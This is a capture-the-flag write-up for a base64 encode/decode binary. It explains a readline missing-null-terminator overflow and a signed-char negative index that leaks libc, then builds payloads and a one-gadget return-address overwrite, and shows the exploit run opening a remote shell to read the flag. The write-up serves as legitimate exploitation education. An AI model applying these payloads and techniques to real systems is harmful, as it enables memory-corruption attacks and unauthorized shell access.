The challenge - 2 solves

Hackers always love base64.

nc 185.14.184.242 9990

This challenge provided a binary that took some input from the user, and either base64 encoded or base64 decoded it.

In my opinion, heap note style challenges are really boring these days, so it was refreshing to see a challenge like this and solve it together with the team!

Functionality

First, protections:

$ checksec --file ./chall
[*] './chall'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
    FORTIFY:  Enabled

All protections except a canary implies we may be dealing with a stack buffer overflow.

Fortunately for us, the source was provided. The binary basically shows this menu:

$ ./run.sh 
1. Encode
2. Decode
x. Exit
>

The main function is very simple:

#define BUFFER_SIZE 0x40

int main(void) {
  int choice;
  void (*b64func[])(const char*, char*, int) = {b64encode, b64decode};
  char input[BUFFER_SIZE], output[BUFFER_SIZE];
  memset(input, 0, BUFFER_SIZE);
  memset(output, 0, BUFFER_SIZE);

  for(cnt = 0; cnt < 10; cnt++) {
    // read user input
    choice = menu();
    if (choice < 1 || choice > 2) break;

    // encode | decode
    readline("Input: ", input, BUFFER_SIZE);
    b64func[choice-1](input, output, strlen(input));

    // show result
    if (b64chkerr()) {
      printf("Error: %s\n", b64errmsg());
    } else {
      printf("Output: %s\n", output);
    }
  }

  puts("Bye!");
}

The code has two function pointers on the stack from a base64 library (libbase64.so), followed by two buffers for the input and output, both of which are 0x40 bytes in size.

It essentially does the following:

Asks whether you want to encode or decode some string.
Stores your input inside input.
Stores the encoded / decoded output into output.
Prints the output. If an error occurs, it prints the error instead.

First bug - unexploitable stack buffer overflow

The first thing you'll notice is that the input and output buffers have the same size. Why is this a problem? Well, consider the following:

$ echo -n "A" | base64
QQ==

As you can see, encoding one byte turned into a 4 byte output. Similarly, if you attempt to encode 0x40 bytes, you will see the problem:

>>> from base64 import *
>>> b64encode(b"A"*0x40)
b'QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQ=='
>>> len(_)
88
>>> hex(_)
'0x58

As you can see, we have an overflow of 0x18 bytes past the output buffer.

Note that the same bug does not exist when decoding some input. Any 4-byte encoded input can be decoded into either 1, 2, or 3 bytes, so the overflow will be non-existent.

Unfortunately though, this isn't exploitable for two reasons:

The most obvious reason - we're forced to overflow with any bytes in "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" (i.e valid base64 encoded output). This isn't nearly enough bytes to overwrite the return address with a valid address in order to ROP or etc.
A less obvious reason - the return address is 0x28 bytes past the end of the output buffer, so it's impossible to reach it. There is nothing of interest between the output buffer and the return address (see the stack layout in the next section).

Second bug - No null byte == exploitable stack buffer overflow

The stack layout for the main function is as follows:

+-------------------------+  |
|         choice          |  |
+-------------------------+  |
| b64.* function pointers |  |  addresses growing
+-------------------------+  |  larger downwards
|       input buffer      |  |
+-------------------------+  |
|      output buffer      |  |
+-------------------------+  v

Looking at readline, the bug is pretty obvious:

void readline(const char *msg, char *buf, int size) {                              
  int s;                                                                           
                                                                                   
  if (msg) printf("%s", msg);                                                      
  if ((s = read(0, buf, size)) <= 0) exit(0);                                      
                                                                                   
  if (buf[s-1] == '\n') buf[s-1] = 0;                                              
  else if (s < size) buf[s] = 0;                                                   
}

readline is only ever called with the size argument set to BUFFER_SIZE == 0x40. If we read in exactly 0x40 bytes of input and don't input a NULL byte at the end, then the input and output buffers will be connected without a NULL byte between them.

When the program finally calls b64func[choice-1](input, output, strlen(input));, the size argument is passed in as strlen(input). Remember that strlen stops at NULL bytes, so if the input buffer doesn't end with a NULL byte, it will include whatever bytes are in the output buffer in its length calculation.

In order to see why this is a problem, we have to look at one of the b64encode or b64decode functions (they behave similarly in this regard):

void b64decode(const char *input, char *output, int size) {
  int i, j, k, len;
  unsigned int block;
  char c;
  const char *ptr;
  __b64_error = B64_ERROR_NONE;

  /* Check input length */
  for(ptr = input; *ptr; ++ptr);
  len = (int)(ptr - input); // [ 1 ]
  if (len % 4) {
    __b64_error = B64_ERROR_INVALID_LEN;
    return;
  }

  /* Decode */
  for(i = j = 0; j < len; i += 3, j += 4) { // [ 2 ]
    block = 0;
    for(k = 0; k < 4; k++) {
      c = b64_reverse_table[input[j+k]];
      if (c == -1) {
        __b64_error = B64_ERROR_INVALID_CHAR;
        return;
      }
      block = (block << 6) | c;
    }
    output[i+0] = block >> 16;
    output[i+1] = (block >> 8) & 0xff;
    output[i+2] = block & 0xff;
  }

  /* Null terminate */
  output[i] = 0;
}

Looking at the code for b64decode, it goes into a loop at [ 2 ], performs the decoding, and writes the final output to output[i+0], output[i+1], and output[i+2].

This code looks okay at first glance (except for the fact that the size is never used), but consider the bug we just talked about. If we trigger it successfully, then the len calculated at [ 1 ] will also include the bytes within the output buffer. Since the input and output buffers are both 0x40 bytes in size, if we ensure both the input and output buffers are full at this point, then the final len calculated will be 0x80, which will definitely cause the decoded output to overflow past the output buffer!

Many hours of effort

First few hours

Me and kileak spent quite a few hours working on exploiting the binary with this bug. We were mainly trying one thing: partially overwrite the 3 least significant bytes of the return address of main (which is a libc address) to point to a one gadget, and then just bruteforce to get a shell remotely.

The main reason we were trying this was because of r4j and hk's new libpwntools. Written in C++, this is a very very performant version of pwntools that allows you bruteforce a one gadget's address straight from main's return address in approximately 20 seconds!

Looking at the code for b64decode above, we can see that it null terminates the output before returning it at the end, which would be a problem for the bruteforce. However, we can bypass this constraint easily: there is an error condition inside the decode loop that can cause it to return early without null terminating the input. If we can cause it to error out right after we've partially overwritten the return address of main with a valid one gadget's address, we can just proceed to bruteforce and wait for a shell.

The real challenge of course, is being able to do that in the first place. We spent many hours trying to get this done, but could not do it.

One thing I noticed was that sometimes our input would end up with non-deterministic decoded output (like a NULL byte randomly in the middle of the decoded output somewhere). I didn't think anything of this at the time, but this ended up being the key to solving the challenge, so we'll get back to that a little later.

I did however manage to overwrite the return address completely with the following setup. It's a little hard to explain exactly what's going on, but we basically cause our input to be decoded to valid base64, which will cause that to be decoded to valid base64, and finally that will again be decoded to valid ASCII, which overwrites the return address:

decode(b64encode(b64encode(b64encode(b"BBB"*9))))
decode(b64encode(b64encode(b64encode(b"BBB"*9))))
decode(b64encode(b64encode(b64encode(b"BBB"*6 + b"BB" + b"A"*6))))

This will overwrite main's return address to 0x0000414141414141. However, this is useless without a leak, so let's keep work on that.

Next few hours

If we check the stack before we've input anything, we can see that the return address is set out like this:

+---------------+----------------+
|               |                |
|      NULL     |  libc_csu_init |
+---------------+----------------+
|               |   some stack   |
|     _start    |     address    |
+---------------+----------------+
|               |      main's    |
|      NULL     |   ret address  |
+---------------+----------------+

So rather than leaking the return address, we could also try leaking the libc_csu_init or _start addresses. Both of these addresses are in the binary rather than in libc, but we can then ROP to leak a libc address and then get a shell.

A small problem here was that both the _start and __libc_csu_init addresses have a NULL byte as their LSB. However, I found out that with the following setup (see exploit script for the functions), I could overwrite the LSB of _start with 0x41:

encode(b"A"*0x30)                                                               
decode(b64encode(b64encode(b"A"*33)) + b64encode(b"A"*3))

Notice that I stopped the loop early in an error condition with the final b64encode(b"A"*3). This prevents the NULL byte from being appended to the output buffer. We can see the payload work here:

gef➤  x/11gx 0x00007ffd97b02f00+0x40
0x7ffd97b02f40:	0x4246555142465551	0x4246555142465551 <- output buffer
0x7ffd97b02f50:	0x4246555142465551	0x4246555142465551
0x7ffd97b02f60:	0x4246555142465551	0x4141410042465551
0x7ffd97b02f70:	0x4141414141414141	0x4141414141414141
0x7ffd97b02f80:	0x4141414141414141	0x4141414141414141 <- __libc_csu_init
0x7ffd97b02f90:	0x00007f5a6b093b41 <- _start (LSB overwritten)

My idea was then to encode an input of "A"*0x40, which would end up encoding the address and returning it. I could then just decode it myself and get a leak.

In hindsight, this will obviously not work, because the address will be overwritten by our encoded output long before it's used as an input to encode (hindsight is 20/20, as usual).

However, even assuming that it would work, we have another problem. If you look closely at 0x7ffd97b02f60+8 above, you'll see that there is a null byte in the middle of the decoded output. This will cause the strlen(input) to stop there, and we will never be able to encode the address.

At this point, I spent a little longer figuring out why this NULL byte was being inserted here, but couldn't figure it out. It was mostly because I was feeling very lazy and just couldn't be bothered understanding the decode algorithm :p

Third bug - Negative index in encode / decode

It was at this point that RBTree decided to join and have a look at the challenge. While I was being lazy doing other non-CTF things, he managed to find out more about that non-deterministic output that I mentioned previously when decoding. It took him 2 hours to find that there was a much more subtle bug in the b64encode and b64decode functions.

Let's look at b64decode again:

void b64decode(const char *input, char *output, int size) {
  // [ ... ]

  /* Decode */
  for(i = j = 0; j < len; i += 3, j += 4) {
    block = 0;
    for(k = 0; k < 4; k++) {
      c = b64_reverse_table[input[j+k]]; // [ 1 ]
      if (c == -1) {
        __b64_error = B64_ERROR_INVALID_CHAR;
        return;
      }
      block = (block << 6) | c;
    }
    // [ ... ]
  }

  /* Null terminate */
  output[i] = 0;
}

At [ 1 ], we see that it accesses b64_reverse_table[input[j+k]]. The reverse table is initialized by storing all the possible bytes (in a certain order) that any valid base64 encoded input can be decoded into. The algorithm uses these stored bytes to decode our base64 encoded input. It behaves correctly here, but there is a very subtle bug.. char's are actually considered signed by default! In hindsight, this makes perfect sense, but I, for some reason, always assumed that char's were unsigned by default.

In this case, input[j+k] is a char, which is a 1 byte int. RBTree managed to figure out that any input byte that has an ordinal value greater than 0x7f is considered a negative number here, and thus will access memory behind b64_reverse_table!

Let's have a look at the memory real quick:

gef➤  x/28gx 0x7f5a6b092060 - 0x70
0x7f5a6b091ff0:	0x0000000000000000	0x00007f5a6aae3520 <- libc address!
0x7f5a6b092000:	0x0000000000200e10	0x00007f5a6b4bc000
0x7f5a6b092010:	0x00007f5a6b2ae750	0x00007f5a6ae91696
0x7f5a6b092020:	0x00007f5a6b092020	0x0000000000000000
0x7f5a6b092030:	0x0000000000000000	0x0000000000000000
0x7f5a6b092040 <completed.7698>:	0x0000000000000000	0x0000000000000000
0x7f5a6b092050:	0x0000000000000000	0x0000000000000000
0x7f5a6b092060 <b64_reverse_table>:	0xffffffffffffffff	0xffffffffffffffff
0x7f5a6b092070 <b64_reverse_table+16>:	0xffffffffffffffff	0xffffffffffffffff
0x7f5a6b092080 <b64_reverse_table+32>:	0xffffffffffffffff	0x3fffffff3effffff
0x7f5a6b092090 <b64_reverse_table+48>:	0x3b3a393837363534	0xffff00ffffff3d3c
0x7f5a6b0920a0 <b64_reverse_table+64>:	0x06050403020100ff	0x0e0d0c0b0a090807
0x7f5a6b0920b0 <b64_reverse_table+80>:	0x161514131211100f	0xffffffffff191817
0x7f5a6b0920c0 <b64_reverse_table+96>:	0x201f1e1d1c1b1aff	0x2827262524232221

gef➤  xinfo 0x00007f5a6aae3520
────────────────────────────────────────────────────────────────────────── xinfo: 0x7f5a6aae3520 ──────────────────────────────────────────────────────────────────────────
Page: 0x00007f5a6aaa0000  →  0x00007f5a6ac87000 (size=0x1e7000)
Permissions: r-x
Pathname: ./libc.so.6
Offset (from page): 0x43520
Inode: 120325114
Segment: .text (0x00007f5a6aac12d0-0x00007f5a6ac39c3c)
Offset (from segment): 0x22250
Symbol: __cxa_finalize

As seen in the output above, at &b64_reverse_table - 0x68, we have a libc address!

Libc leak

The idea for the leak is simple now. Using the negative indexing bug above, we can cause the b64decode function to return the bytes from that libc address at &b64_reverse_table - 0x68 to us as decoded output. However, doing it the trivial way won't work. Why? Well, let's look at the b64decode function one last time:

void b64decode(const char *input, char *output, int size) {
  // [ ... ]

  /* Check input length */
  for(ptr = input; *ptr; ++ptr);
  len = (int)(ptr - input);
  if (len % 4) {
    __b64_error = B64_ERROR_INVALID_LEN;
    return;
  }

  /* Decode */
  for(i = j = 0; j < len; i += 3, j += 4) {
    block = 0;
    for(k = 0; k < 4; k++) {
      c = b64_reverse_table[input[j+k]]; // [ 1 ]
      if (c == -1) {
        __b64_error = B64_ERROR_INVALID_CHAR;
        return;
      }
      block = (block << 6) | c; // [ 2 ]
    }

    // [ 3 ]
    output[i+0] = block >> 16;
    output[i+1] = (block >> 8) & 0xff;
    output[i+2] = block & 0xff;
  }

  /* Null terminate */
  output[i] = 0;
}

At [ 1 ], assuming we trigger the bug with an input byte that has an ordinal value of -0x68, this will access b64_reverse_table[-0x68]. However, there is a length check that ensures that the input is a multiple of 4 bytes, which means we will also have to input three other bytes along side the negative index.

The problem here occurs at [ 2 ] and [ 3 ]. At [ 2 ], the byte read for c is stored inside block, but block itself is left shifted by 6 for each byte. At [ 3 ], block is right shifted by 16, 8, and 0 when being stored.

The problem here is that the decoded output cannot trivially be converted back to its original form if the output has any byte > 0x7f inside it. Consider the following

>>> # Our input will be "BBBB"
>>> hex(ord("B"))
'0x42'
>>> # b64_reverse_table[0x42] is just 0x01
>>> block = 0
>>> block = (block << 6) | 0x01
>>> block = (block << 6) | 0x01
>>> block = (block << 6) | 0x01
>>> block = (block << 6) | 0x01
>>> block
266305
>>> bin(block)
'0b1000001000001000001'
>>> output1 = block >> 16
>>> output2 = (block >> 8) & 0xff
>>> output3 = block & 0xff
>>> output1
4
>>> output2
16
>>> output3
65
>>> bin(output1)
'0b100'
>>> bin(output2)
'0b10000'
>>> bin(output3)
'0b1000001'
>>> bin(0x42)
'0b1000010'

If you notice above, the final decoded output will be "\x04\x10\x41". Note how this is not visually encodable back to "BBBB". Now, if you try to run this through the encode function, this will decode just fine because every byte is <= 0x7f.

However, running the following through the b64encode function will trigger a segfault:

encode(b"\x80"*4)

The reason this occurs is because the negative indexing bug also exists inside the b64encode function, and this causes it to access a very large negative index inside the b64_table, which hits unmapped memory and crashes.

So, how do we figure out what the leaked bytes are if they are going to just crash the binary like this? Well, we could try to use pwntools base64.b64encode to encode the bytes back, but this returns other encoded bytes because of reasons ™️

RBTree of course, had a great solution to this problem. If we can pick some input such that c ends up having it's two least significant bits set to 0, then we don't actually lose any information when right shifting and storing the different parts of the block into the output, since the left shift by 6 will still basically look like a left shift by 8 (the bottom two bits are zeroed).

One such possible c is when our input is "8":

>>> # Our input is "8888"
>>> ord("8")
56
>>> # b64_reverse_table[56] is 0x3c
>>> bin(0x3c) # Notice the two least significant bits!
'0b111100'
>>> block = 0
>>> block = (block << 6) | 0x3c
>>> block = (block << 6) | 0x3c
>>> block = (block << 6) | 0x3c
>>> block = (block << 6) | 0x3c
>>> hex(block)
'0xf3cf3c'
>>> output1 = block >> 16
>>> output2 = (block >> 8) & 0xff
>>> output3 = block & 0xff
>>> hex(output1)
'0xf3'
>>> hex(output2)
'0xcf'
>>> hex(output3) # Notice our last input to block was 0x3c
'0x3c'

As you can see, we can visually see the very last byte that was OR'd into block in the output! In this case, it's just 0x3c, but this byte can now be a byte from our libc leak and we'll be able to use it directly.

So the idea now is to leak each byte of the libc address by setting the string to b"888" followed by the negative index. This will cause the last byte (the leaked byte) to not be interfered with, since the "8" before it will have it's two least significant bits set to 0. We can achieve this with the following code:

# Libc address is at &b64_reverse_table - 0x68.
# No need to leak LSB or the 6th byte, since those are constant.
decode(b"888\x99888\x9a888\x9b888\x9c")

Where 0x99 being the same as -0x67, and etc..

After this, we can overwrite the return address with a one gadget as shown in the First few hours section.

Final exploit

The final exploit script can be found here.

$ ./exploit.py 
[*] './chall'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
    FORTIFY:  Enabled
[*] './libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to 185.14.184.242 on port 9990: Done
[*] Libc base: 0x7f6f313c5000
[*] Switching to interactive mode
Bye!
$ ls
chall
flag-2ab34690951adedf25f0c6e31fbc4b2b.txt
ld-2.27.so
libbase64.so
libc.so.6
redir.sh
$ cat flag-2ab34690951adedf25f0c6e31fbc4b2b.txt
S4CTF{_1mpL1c1t__tyP3__c0nv3rS10N}

farazsth98/b64lib.md